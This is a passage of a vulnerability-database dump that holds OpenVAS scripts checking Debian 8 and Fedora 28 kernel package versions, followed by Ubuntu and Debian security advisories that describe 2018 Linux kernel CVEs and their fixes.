!= NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-armmp\", ver:\"3.16.57-1\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-6\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": 
"2018-07-12T00:00:00", "id": "OPENVAS:1361412562310874786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874786", "title": "Fedora Update for kernel FEDORA-2018-d82a45d9ab", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d82a45d9ab_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-d82a45d9ab\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874786\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 06:09:39 +0200 (Thu, 12 Jul 2018)\");\n script_cve_id(\"CVE-2018-12714\", \"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\",\n \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\",\n \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-d82a45d9ab\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d82a45d9ab\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6L2AHGVDF5O7XJPPZZVBSBDNW6RK5HYX\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.4~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-07-03T00:00:00", "id": "OPENVAS:1361412562310874757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874757", "title": "Fedora Update for kernel FEDORA-2018-d92fde52d7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d92fde52d7_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-d92fde52d7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874757\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-03 06:01:31 +0200 (Tue, 03 Jul 2018)\");\n script_cve_id(\"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\",\n \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\",\n \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-d92fde52d7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d92fde52d7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QGK5XWFJBXPFE4K3ZVUM4BXLGPPTEYTH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.3~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-24T00:00:00", "id": "OPENVAS:1361412562310874731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874731", "title": "Fedora Update for kernel FEDORA-2018-2c6bd93875", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2c6bd93875_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-2c6bd93875\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874731\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-24 06:00:43 +0200 (Sun, 24 Jun 2018)\");\n script_cve_id(\"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\",\n \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\",\n \"CVE-2018-1108\", \"CVE-2018-11412\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-2c6bd93875\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2c6bd93875\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3ZX2MJK6W3L6HWB2BTYHWGJCOYG3RMMI\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.2~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-20T00:00:00", "id": "OPENVAS:1361412562310874710", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874710", "title": "Fedora Update for kernel FEDORA-2018-bb7aab12cb", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bb7aab12cb_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-bb7aab12cb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874710\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-20 06:20:48 +0200 (Wed, 20 Jun 2018)\");\n script_cve_id(\"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-bb7aab12cb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bb7aab12cb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EPUROU5WET33FBYHDLFA2KUUGYZTHVZ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
 script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.16~300.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:50", "bulletinFamily": "unix", "description": "Jann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00e4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. 
A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nUSN 3652-1 added a mitigation for Speculative Store Bypass a.k.a. Spectre Variant 4 (CVE-2018-3639). This update provides the corresponding mitigation for ARM64 processors. Please note that for this mitigation to be effective, an updated firmware for the processor may be required.", "modified": "2018-10-01T00:00:00", "published": "2018-10-01T00:00:00", "id": "USN-3777-1", "href": "https://usn.ubuntu.com/3777-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T19:21:46", "bulletinFamily": "unix", "description": "USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. 
(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00e4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nUSN 3653-2 added a mitigation for Speculative Store Bypass a.k.a. Spectre Variant 4 (CVE-2018-3639). This update provides the corresponding mitigation for ARM64 processors. Please note that for this mitigation to be effective, an updated firmware for the processor may be required.
", "modified": "2018-10-01T00:00:00", "published": "2018-10-01T00:00:00", "id": "USN-3777-2", "href": "https://usn.ubuntu.com/3777-2/", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "debian": [{"lastseen": "2019-09-25T22:36:11", "bulletinFamily": "unix", "description": "Package : linux\nVersion : 3.16.57-2\nCVE ID : CVE-2017-5715 CVE-2017-5753 CVE-2018-1066 CVE-2018-1093\n CVE-2018-1130 CVE-2018-3665 CVE-2018-5814 CVE-2018-9422\n CVE-2018-10853 CVE-2018-10940 CVE-2018-11506 CVE-2018-12233\n CVE-2018-1000204\nDebian Bug : 898165\n\nThe previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system.\n\n This specific attack has been named Spectre variant 2 (branch\n target injection) and is mitigated for the x86 architecture (amd64\n and i386) by using new microcoded features.\n\n This mitigation requires an update to the processor's microcode,\n which is non-free. 
For recent Intel processors, this is included\n in the intel-microcode package from version 3.20180425.1~deb8u1.\n For other processors, it may be included in an update to the\n system BIOS or UEFI firmware, or in a later update to the\n amd64-microcode package.\n\n This vulnerability was already mitigated for the x86 architecture\n by the \"retpoline\" feature.\n\nCVE-2017-5753\n\n Further instances of code that was vulnerable to Spectre variant 1\n (bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\n Dan Aloni reported to Red Hat that the CIFS client implementation\n would dereference a null pointer if the server sent an invalid\n response during NTLMSSP setup negotiation. This could be used by a\n malicious server for denial of service.\n\n The previously applied mitigation for this issue was not\n appropriate for Linux 3.16 and has been replaced by an alternate\n fix.\n\nCVE-2018-1093\n\n Wen Xu reported that a crafted ext4 filesystem image could trigger\n an out-of-bounds read in the ext4_valid_block_bitmap() function. A\n local user able to mount arbitrary filesystems could use this for\n denial of service.\n\nCVE-2018-1130\n\n The syzbot software found that the DCCP implementation of\n sendmsg() does not check the socket state, potentially leading\n to a null pointer dereference. A local user could use this to\n cause a denial of service (crash). \n\nCVE-2018-3665\n\n Multiple researchers have discovered that some Intel x86\n processors can speculatively read floating-point and vector\n registers even when access to those registers is disabled. 
The\n Linux kernel's \"lazy FPU\" feature relies on that access control to\n avoid saving and restoring those registers for tasks that do not\n use them, and was enabled by default on x86 processors that do\n not support the XSAVEOPT instruction.\n\n If \"lazy FPU\" is enabled on one of the affected processors, an\n attacker controlling an unprivileged process may be able to read\n sensitive information from other users' processes or the kernel.\n This specifically affects processors based on the \"Nehalem\" and\n \"Westmere\" core designs.\n \n This issue has been mitigated by disabling \"lazy FPU\" by default\n on all x86 processors that support the FXSAVE and FXRSTOR\n instructions, which includes all processors known to be affected\n and most processors that perform speculative execution. It can\n also be mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\n Jakub Jirasek reported race conditions in the USB/IP host driver.\n A malicious client could use this to cause a denial of service\n (crash or memory corruption), and possibly to execute code, on a\n USB/IP server.\n\nCVE-2018-9422\n\n It was reported that the futex() system call could be used by an\n unprivileged user for privilege escalation.\n\nCVE-2018-10853\n\n Andy Lutomirski and Mika Penttil\u00e4 reported that KVM for x86\n processors did not perform a necessary privilege check when\n emulating certain instructions. This could be used by an\n unprivileged user in a guest VM to escalate their privileges\n within the guest.\n\nCVE-2018-10940\n\n Dan Carpenter reported that the optical disc driver (cdrom) does\n not correctly validate the parameter to the CDROM_MEDIA_CHANGED\n ioctl. A user with access to a cdrom device could use this to\n cause a denial of service (crash).\n\nCVE-2018-11506\n\n Piotr Gabriel Kosinski and Daniel Shapira reported that the\n SCSI optical disc driver (sr) did not allocate a sufficiently\n large buffer for sense data. 
A user with access to a SCSI\n optical disc device that can produce more than 64 bytes of\n sense data could use this to cause a denial of service (crash\n or memory corruption), and possibly for privilege escalation.\n\nCVE-2018-12233\n\n Shankara Pailoor reported that a crafted JFS filesystem image\n could trigger a denial of service (memory corruption). This\n could possibly also be used for privilege escalation.\n\nCVE-2018-1000204\n\n The syzbot software found that the SCSI generic driver (sg) would\n in some circumstances allow reading data from uninitialised\n buffers, which could include sensitive information from the kernel\n or other tasks. However, only privileged users with the\n CAP_SYS_ADMIN or CAP_SYS_RAWIO capability were allowed to do this,\n so this has little or no security impact.\n\nFor Debian 8 \"Jessie\", these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "modified": "2018-07-15T03:02:08", "published": "2018-07-15T03:02:08", "id": "DEBIAN:DLA-1422-2:DC70E", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00016.html", "title": "[SECURITY] [DLA 1422-2] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-25T22:36:29", "bulletinFamily": "unix", "description": "Package : linux\nVersion : 3.16.57-1\nCVE ID : CVE-2017-5715 CVE-2017-5753 CVE-2018-1066 CVE-2018-1093\n CVE-2018-1130 CVE-2018-3665 CVE-2018-5814 CVE-2018-9422\n CVE-2018-10853 CVE-2018-10940 CVE-2018-11506 CVE-2018-12233\n 
CVE-2018-1000204\nDebian Bug : 898165\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nThis update is not yet available for the armhf (ARM EABI hard-float)\narchitecture.\n\nCVE-2017-5715\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system.\n\n This specific attack has been named Spectre variant 2 (branch\n target injection) and is mitigated for the x86 architecture (amd64\n and i386) by using new microcoded features.\n\n This mitigation requires an update to the processor's microcode,\n which is non-free. For recent Intel processors, this is included\n in the intel-microcode package from version 3.20180425.1~deb8u1.\n For other processors, it may be included in an update to the\n system BIOS 